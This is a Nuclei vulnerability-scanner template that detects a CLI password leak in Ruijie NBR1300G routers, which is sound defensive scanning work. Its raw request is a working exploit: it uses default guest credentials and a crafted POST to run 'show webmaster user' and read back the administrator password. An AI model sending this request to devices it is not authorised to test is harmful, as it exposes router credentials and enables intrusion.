nuclei-templates/http/exposures/configs/ruijie-nbr1300g-exposure.yaml

40 lines
1.3 KiB
YAML
Raw Permalink Normal View History

2021-09-21 11:46:53 +00:00
id: ruijie-nbr1300g-exposure
info:
name: Ruijie NBR1300G Cli Password Leak - Detect
author: pikpikcu
2023-03-02 20:58:29 +00:00
severity: high
description: Ruijie NBR1300G CLI password leak vulnerability was detected.
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
- https://www.ruijienetworks.com
classification:
2023-03-02 20:58:29 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
tags: ruijie,exposure
http:
- raw:
- |
POST /WEB_VMS/LEVEL15/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition: and
matchers:
- type: word
words:
- "webmaster level 2 username guest password guest"
part: body
- type: status
status:
- 200
# digest: 4b0a00483046022100bf100722cca22f3fc35e3e6938fc12ae65ae319759574b3a4dbb977ff1018d77022100d1cd047a1a03d310824b009e88bc3f1ec7da9cf3953f598e8b70d60ef1e59370:922c64590222798bb761d5b6d8e72950